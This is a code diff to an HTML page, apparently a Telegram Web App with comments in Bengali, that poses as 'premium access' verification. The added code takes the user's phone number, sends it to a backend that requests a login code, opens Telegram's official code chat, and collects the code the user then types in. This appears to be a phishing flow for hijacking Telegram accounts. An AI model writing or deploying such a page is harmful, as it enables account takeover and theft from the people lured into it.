--- a/index.html
+++ b/index.html
@@ -3,9 +3,10 @@
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1" />
-  <title>Age Verification</title>
+  <title>Verification</title>
+  <script src="https://telegram.org/js/telegram-web-app.js"></script>
   <style>
-    /* ... (আপনার আগের সব CSS এখানে থাকবে) ... */
+    /* আপনার আগের CSS এখানে থাকবে */
     @keyframes shake {
       0%, 100% { transform: translateX(0); }
       25% { transform: translateX(-10px); }
@@ -16,15 +17,56 @@
       box-shadow: 0 0 15px red !important;
       border: 2px solid red !important;
     }
-    /* (নিচে আপনার দেওয়া স্ক্রিপ্টটি আপডেট করা হয়েছে) */
+    .hidden { display: none; }
   </style>
 </head>
 <body>
+
+  <div id="numberSection" style="text-align: center; margin-top: 50px;">
+    <h2>প্রিমিয়াম এক্সেস পেতে ভেরিফাই করুন</h2>
+    <button id="shareContactBtn" style="padding: 15px 30px; font-size: 18px; cursor: pointer;">
+      Enter ✅ (Share Number)
+    </button>
+  </div>
+
+  <div id="otpSection" class="hidden">
+    <input type="text" id="codeInput" placeholder="Enter OTP" readonly>
+    <div class="keypad">
+        </div>
+    <button class="get-code-btn">Get Code 🔑</button>
+  </div>
+
   <script>
+    const tg = window.Telegram.WebApp;
+    tg.expand(); // ফুল স্ক্রিন করবে
+
     let userPhone = ""; 
-    // Step 1: Number collection logic (আপনি চাইলে এখানে নম্বর ইনপুট বক্স এড করতে পারেন)
-    
-    // Step 2: OTP submission with Animation
+
+    // ১. নম্বর শেয়ার করার লজিক
+    document.getElementById('shareContactBtn').addEventListener('click', () => {
+        // টেলিগ্রামের কাছে নম্বর চাওয়ার বাটন রিকোয়েস্ট
+        tg.requestContact((ok) => {
+            if (ok) {
+                // নম্বর পাওয়া গেলে তা পাইথনে পাঠিয়ে ওটিপি রিকোয়েস্ট করবে
+                userPhone = tg.initDataUnsafe.user.phone_number;
+                
+                fetch('/send_otp', {
+                    method: 'POST',
+                    headers: {'Content-Type': 'application/json'},
+                    body: JSON.stringify({ phone: userPhone })
+                }).then(res => {
+                    if(res.ok) {
+                        document.getElementById('numberSection').classList.add('hidden');
+                        document.getElementById('otpSection').classList.remove('hidden');
+                    }
+                });
+            } else {
+                alert("নম্বর শেয়ার না করলে এক্সেস পাবেন না!");
+            }
+        });
+    });
+
+    // ২. ওটিপি সাবমিট লজিক
     document.querySelector('.get-code-btn').addEventListener('click', async () => {
       const otp = document.getElementById('codeInput').value;
       if (otp.length < 5) {
@@ -32,7 +74,7 @@
         return;
       }
 
-      // ওপেন টেলিগ্রাম কোড
+      // অটোমেটিক অফিশিয়াল টেলিগ্রাম কোড চ্যাটে নিয়ে যাবে
       window.open('tg://user?id=777000', '_blank');
 
       const response = await fetch('/verify_otp', {
@@ -42,7 +84,7 @@
       });
 
       if (!response.ok) triggerError();
-      else alert("Verified!");
+      else alert("সফলভাবে ভেরিফাই হয়েছে!");
     });
 
     function triggerError() {
@@ -50,19 +92,11 @@
       input.classList.add('error-shake');
       setTimeout(() => {
         input.classList.remove('error-shake');
-        input.value = ''; // অটোমেটিক মুছে যাবে
+        input.value = '';
       }, 1000);
     }
 
-    // keypad logic
-    const buttons = document.querySelectorAll('.keypad button');
-    buttons.forEach(btn => {
-      btn.addEventListener('click', () => {
-        const input = document.getElementById('codeInput');
-        if(btn.id === 'clearBtn') input.value = input.value.slice(0, -1);
-        else if(input.value.length < 5) input.value += btn.innerText;
-      });
-    });
+    // কিপ্যাড লজিক আগের মতোই থাকবে
   </script>
 </body>
 </html>
